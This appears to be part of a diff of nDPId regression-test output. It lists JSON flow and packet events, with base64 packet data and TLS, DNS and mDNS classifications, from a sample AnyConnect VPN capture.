01489{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687245688,"flow_last_seen":1569687245851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5959,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1569687245851,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","alpn":"http\/1.1","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245379,"flow_last_seen":1569687245379,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687245379,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1569687245379,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687245379,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95WAbsTaDYfAAAAALAC\/\/\/9eAAAAgQFtAEDAwUBAQgKHA16ewAAAAAEAgAA"}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1569687245420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687245420,"pkt":"NDY7z3UoLH6BsEqhCABFAAA4kvsAAPcGt2EIJWZbCgAA4wG73lYzzRbpE2g2IJASgADBAwAAAgQFtAEBCAo\/+VnGHA16ew=="}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1569687245420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245420,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95WAbsTaDYgM80W6oAQ\/\/9YmgAAAQEIChwNeqI\/+VnG"}
00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687245379,"flow_last_seen":1569687245420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687245420,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
01102{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687245379,"flow_last_seen":1569687245469,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1615,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1569687245469,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","alpn":"http\/1.1"}}
01489{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687245379,"flow_last_seen":1569687245547,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5904,"flow_avg_l4_payload_len":492,"midstream":0,"thread_ts_msec":1569687245547,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56918,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","alpn":"http\/1.1","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7560000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"thread_ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1569687245576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1569687245576,"pkt":"LH6BsEqhNDY7z3UoCABFAAB1AABAAEAGB84KAADjNCXzrd5TAbsf\/e\/ecO3V5YAYEAD5fAAAAQEIChwNezsAjX27FwMDADwAAAAAAAAABDacZQu2ja7FJp11i4XaHEcZRuFBd8RaXcXBvhAzXAi\/k3IQYhPu9V\/rSa1OnXc4wt4EKb0="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245576,"flow_last_seen":1569687245576,"flow_idle_time":7560000,"flow_min_l4_payload_len":65,"flow_max_l4_payload_len":65,"flow_tot_l4_payload_len":65,"flow_avg_l4_payload_len":65,"midstream":1,"thread_ts_msec":1569687245576,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.37.243.173","src_port":56914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1569687245576,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":131,"pkt_l4_len":97,"thread_ts_msec":1569687245576,"pkt":"LH6BsEqhNDY7z3UoCABFAAB1AABAAEAGB84KAADjNCXzrd5SAbt7aDL2a\/IufIAYEADmYwAAAQEIChwNezsCYFg6FwMDADwAAAAAAAAAA\/6MZ3K3UnwgKSolneP\/V\/Ul5QfA4HWbTZY4CgoWP92J0WcPzatLmBPNGkrfeEXB3KaiGuM="}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1569687245649,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245649,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0y8JAACsGUUw0JfOtCgAA4wG73lNw7dXlH\/3wH4AQAAnwQQAAAQEICgCNhOgcDXs7"}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1569687245653,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245653,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0VN5AACoGyTA0JfOtCgAA4wG73lJr8i58e2gzN4AQAAkgwQAAAQEICgJgYHkcDXs7"}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687245688,"flow_last_seen":1569687245688,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687245688,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1569687245688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687245688,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGwVUKAADjCCVmW95XAbsu53nzAAAAALAC\/\/+c+QAAAgQFtAEDAwUBAQgKHA17pgAAAAAEAgAA"}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1569687245727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1569687245727,"pkt":"NDY7z3UoLH6BsEqhCABFAAA4hY0AAPcGxM8IJWZbCgAA4wG73ldszApGLud59JASgAAy9QAAAgQFtAEBCAo\/+Vr5HA17pg=="}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1569687245727,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687245727,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGwWEKAADjCCVmW95XAbsu53n0bMwKR4AQ\/\/\/KjAAAAQEIChwNe8w\/+Vr5"}
00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687245688,"flow_last_seen":1569687245728,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1569687245728,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
01102{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687245688,"flow_last_seen":1569687245772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1615,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1569687245772,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","alpn":"http\/1.1"}}
01489{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569687245688,"flow_last_seen":1569687245851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5959,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1569687245851,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":56919,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"*.pandion.viasat.com,pandion.viasat.com","ja3":"9f1a41f932f274fe47a992310a26a23a","ja3s":"82f0d8a75fa483d1cfe4b7085b784d7e","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Entrust, Inc., OU=See www.entrust.net\/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K","subjectDN":"C=US, ST=California, L=Carlsbad, O=Viasat Inc., CN=*.pandion.viasat.com","alpn":"http\/1.1","fingerprint":"92:70:CF:E3:69:4B:1D:F4:E2:DE:63:54:EC:DF:40:DB:F3:AC:D1:CA"}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246891,"flow_last_seen":1569687246891,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1569687246891,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1569687246891,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":65,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":65,"pkt_l4_len":31,"thread_ts_msec":1569687246891,"pkt":"LH6BsEqhNDY7z3UoCABFAAAzrdgAAP8Ra2cKAADjS0tMTPaDADUAH3AoGBgBAAABAAAAAAAABWxvY2FsAAAGAAE="}
00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687246891,"flow_last_seen":1569687246891,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":23,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1569687246891,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"local","num_queries":0,"num_answers":0,"reply_code":0,"query_type":6,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -87,8 +87,8 @@
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":102,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247192,"flow_last_seen":1569687247192,"flow_idle_time":180000,"flow_min_l4_payload_len":232,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1569687247192,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.213","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1569687247192,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1569687247192,"pkt":"GIEORo7INDY7z3UoCABFAAEE6tAAAP8RumAKAADjCgAA1RTpFOkA8ADKAACEAAAAAAEAAAAED19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUABQRTFAtUktFUlVSLU9TWCAoOSnADMAyACGAAQAAAHgADQAAAADbaQRuRFBJwCHAMgAQgAEAABGUACIWcnBCQT0zNzoyRTo0Nzo2RDoxODo1NApycFZyPTE1Mi4xEUxQLVJLRVJVUi1PU1ggKDkpDF9kZXZpY2UtaW5mb8AcABAAAQAAEZQAIBRtb2RlbD1NYWNCb29rUHJvMTEsMQpvc3h2ZXJzPTE3wFgAAYABAAAAeAAECgAA4w=="}
00694{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247192,"flow_last_seen":1569687247192,"flow_idle_time":180000,"flow_min_l4_payload_len":232,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":232,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1569687247192,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.213","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}}
00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1569687247306,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":129,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":129,"pkt_l4_len":95,"thread_ts_msec":1569687247306,"pkt":"LH6BsEqhNDY7z3UoCABFAABzAABAAEAGB9AKAADjNCXzrd5SAbt7aDM3a\/IufIAYEAAjBQAAAQEIChwNgekCYGB5FwMDADoAAAAAAAAABP6P4Nbq7ON\/6\/AGxu6nGVDbyH\/VD4ZdKbxLWPLfwYcNeZogzNp7TOtgIRax\/b1ZBFBO"}
00561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1569687247306,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":129,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":129,"pkt_l4_len":95,"thread_ts_msec":1569687247306,"pkt":"LH6BsEqhNDY7z3UoCABFAABzAABAAEAGB9AKAADjNCXzrd5TAbsf\/fAfcO3V5YAYEADtVwAAAQEIChwNgekAjYToFwMDADoAAAAAAAAABVQHVjyN4wBxs8m+2i54okht8UdFndDP4vwtKiUe9j1LvsBOOnvld8r5j6XDOjeRQG2g"}
00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1569687247306,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":129,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":129,"pkt_l4_len":95,"thread_ts_msec":1569687247306,"pkt":"LH6BsEqhNDY7z3UoCABFAABzAABAAEAGB9AKAADjNCXzrd5SAbt7aDM3a\/IufIAYEAAjBQAAAQEIChwNgekCYGB5FwMDADoAAAAAAAAABP6P4Nbq7ON\/6\/AGxu6nGVDbyH\/VD4ZdKbxLWPLfwYcNeZogzNp7TOtgIRax\/b1ZBFBO"}
00561{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1569687247306,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":129,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":129,"pkt_l4_len":95,"thread_ts_msec":1569687247306,"pkt":"LH6BsEqhNDY7z3UoCABFAABzAABAAEAGB9AKAADjNCXzrd5TAbsf\/fAfcO3V5YAYEADtVwAAAQEIChwNgekAjYToFwMDADoAAAAAAAAABVQHVjyN4wBxs8m+2i54okht8UdFndDP4vwtKiUe9j1LvsBOOnvld8r5j6XDOjeRQG2g"}
00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247596,"flow_last_seen":1569687247596,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1569687247596,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1569687247596,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1569687247596,"pkt":"MzMAAAAWGIEORo7Iht1gAAAAACQAAf6AAAAAAAAABAg+RTq8FVL\/AgAAAAAAAAAAAAAAAAAWOgABAAUCAACPANy0AAAAAQQAAAD\/AgAAAAAAAAAAAAAAAAD7"}
00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":111,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687247596,"flow_last_seen":1569687247596,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1569687247596,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
@@ -96,12 +96,12 @@
00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1569687248005,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1569687248005,"pkt":"AQBeAAD7GIEORo7ICABFAACszwUAAP8RAGsKAADV4AAA+xTpFOkAmDTQAAAAAAADAAEAAAABD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEIX2hvbWVraXTAHAAMAAEMX3NsZWVwLXByb3h5BF91ZHDAIQAMAAHADAAMAAEAAA4QABQRTFAtUktFUlVSLU9TWCAoOSnADAAAKQWgAAARlAASAAQADgCaOoEORo7IGIEORo7I"}
00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1569687248006,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":206,"pkt_l4_len":152,"thread_ts_msec":1569687248006,"pkt":"MzMAAAD7GIEORo7Iht1gBoi5AJgR\/\/6AAAAAAAAABAg+RTq8FVL\/AgAAAAAAAAAAAAAAAAD7FOkU6QCYj8YAAAAAAAMAAQAAAAEPX2NvbXBhbmlvbi1saW5rBF90Y3AFbG9jYWwAAAwAAQhfaG9tZWtpdMAcAAwAAQxfc2xlZXAtcHJveHkEX3VkcMAhAAwAAcAMAAwAAQAADhAAFBFMUC1SS0VSVVItT1NYICg5KcAMAAApBaAAABGUABIABAAOAJo6gQ5GjsgYgQ5Gjsg="}
